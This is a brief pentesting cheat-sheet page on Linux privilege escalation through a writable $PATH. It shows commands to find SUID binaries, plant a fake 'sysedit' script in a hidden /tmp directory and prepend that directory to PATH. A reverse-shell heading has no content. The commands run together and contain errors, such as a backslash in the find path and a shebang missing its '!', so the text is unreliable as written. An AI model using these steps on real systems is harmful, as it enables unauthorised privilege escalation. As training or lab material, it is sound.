Writable $PATH
Path Hijacking
Identify the SUID file
find \ -perm -4000 2>/dev/nullCreate a file with malicious content
mkdir /tmp/.my-things
cd !$
echo "#/bin/bash" > sysedit
echo "id > /tmp/.my-things/id.txt" >> syseditUpdate the $PATH variable
echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbinexport PATH=/tmp/.my-things:$PATHecho $PATH
# /tmp/.my-things:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbinIf we want a Reverse Shell
Last updated